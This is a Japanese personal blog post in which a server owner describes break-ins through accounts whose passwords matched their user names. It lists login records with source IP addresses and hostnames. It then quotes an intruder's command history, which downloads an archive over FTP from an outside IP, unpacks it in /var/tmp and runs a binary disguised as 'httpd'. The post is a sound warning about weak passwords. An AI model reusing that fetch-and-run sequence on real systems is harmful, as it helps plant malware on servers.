Linuxサーバに、ユーザ名とパスワードが同じアカウントを作ってインターネットに接続しておくと、非常に危ない目にあうことがわかりました。ここ最近、何だか知らない人がこのサーバに不正ログインしているようなのです。
こんな事、自分には一生縁の無いことだと思っていたのに・・・
ちょっと、そのいきさつを書いておこうと思います。
以下は、不正ログインの記録です。
一番左の列に書いてあるのは、不正ログインに使用されたユーザIDです。
一番右の列に書いてあるホスト名 or IPアドレスは、不正ログインしてきたホストをあらわします。
-------------------------------------------------------------------
yoshimur pts/4 Wed Sep 21 06:32 - 06:32 (00:00) 80.97.226.250
yoshimur pts/2 Wed Sep 21 06:29 - 07:08 (00:39) donald.eco.nihon-u.ac.jp
yoshimur pts/4 Wed Sep 21 05:31 - 05:36 (00:04) 80.97.226.250
yoshimur pts/3 Wed Sep 21 05:29 - 07:40 (02:11) 80.97.226.250
yoshimur pts/2 Wed Sep 21 05:26 - 06:05 (00:39) donald.eco.nihon-u.ac.jp
kouhei pts/2 Tue Sep 20 08:07 - 08:10 (00:03) 61-220-196-90.hinet-ip.hinet.net
kouhei pts/1 Tue Sep 20 08:00 - 08:49 (00:49) 210.219.251.50
garnet pts/1 Fri Sep 16 21:07 - down (02:26) acb17686.ipt.aol.com
garnet pts/1 Fri Sep 16 19:30 - 19:34 (00:03) 218.55.114.254
-------------------------------------------------------------------
色々なホストから不正ログインされています。恐ろしい。
でも、自分にも落ち度があったことにも気がつきました。今回、不正ログインに使用されたアカウントは、いずれも自分が作成したものなのです。そこまではいいのですが、実はアカウントを作成した際、パスワードを考えるのが面倒くさかったので、ユーザIDと同じにしてしまっていたのです・・・。こんなことになるなんて全然思ってもみませんでした。今後は気をつけようと思います。
ちなみに、ユーザID:yoshimuraを使って不正ログインしてきた人が、このサーバで実行したコマンドの履歴があったのですが、このような内容でした。
-------------------------------------------------------------------
cd /var/tmp
ps -aux
uname -a
ftp -v 210.177.79.220
tar zxvf mech.tgz
rm -rf mech.tgz
cd .a
./httpd
exit
-------------------------------------------------------------------
どこかのFTPサーバから圧縮済みのファイルをダウンロードして、「/var/tmp/」に展開後、解凍して何かを実行したようです。
こんな変なことをする人がいるので、辞書に載っているような単語や、一般的な苗字・名前をユーザ名として使っていて、かつユーザ名と同じパスワードに設定しておくのは、めちゃくちゃ危ないです。
何が面白くて、こんなことするのでしょう?もうやめて欲しいなぁ・・・。
コメントする